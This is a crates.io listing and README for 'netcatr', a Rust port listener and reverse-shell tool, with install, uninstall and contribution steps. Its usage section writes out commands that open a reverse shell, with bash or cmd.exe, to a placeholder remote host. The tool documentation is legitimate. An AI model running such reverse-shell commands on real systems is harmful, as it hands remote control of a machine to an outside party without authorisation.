Crates.io | netcatr |
lib.rs | netcatr |
version | 0.1.2 |
source | src |
created_at | 2024-10-26 13:58:24.303409 |
updated_at | 2024-10-31 17:20:58.630412 |
description | netcatr: A cross-platform port listener and reverse shell application designed for ease of use, providing seamless network connectivity. |
homepage | https://trinhminhtriet.com |
repository | https://github.com/trinhminhtriet/netcatr |
max_upload_size | |
id | 1423880 |
size | 35,897 |
_ _
_ __ ___ | |_ ___ __ _ | |_ _ __
| '_ \ / _ \| __| / __| / _` || __|| '__|
| | | || __/| |_ | (__ | (_| || |_ | |
|_| |_| \___| \__| \___| \__,_| \__||_|
📡 netcatr: A cross-platform port listener and reverse shell application designed for ease of use, providing seamless network connectivity.
To install netcatr, simply clone the repository and follow the instructions below:
git clone git@github.com:trinhminhtriet/netcatr.git
cd netcatr
cargo build --release
cp ./target/release/netcatr /usr/local/bin/
Running the below command will globally install the netcatr
binary.
cargo install netcatr
The most basic and useful example to start listening on a port would be (you can even run vim inside netcatr with this):
netcatr listen -ib 55600
and to connect:
netcatr connect -s bash the.0.0.ip 55600
Reverse shell from Windows:
netcatr connect -s cmd.exe the.0.0.ip 55600
Running the below command will globally uninstall the netcatr
binary.
cargo uninstall netcatr
Remove the project repo
rm -rf /path/to/git/clone/netcatr
We welcome contributions!
git checkout -b my-feature
;git commit -m "feat: my new feature"
;git push origin my-feature
.Once your pull request has been merged, you can delete your branch.
This project is licensed under the MIT License - see the LICENSE file for details.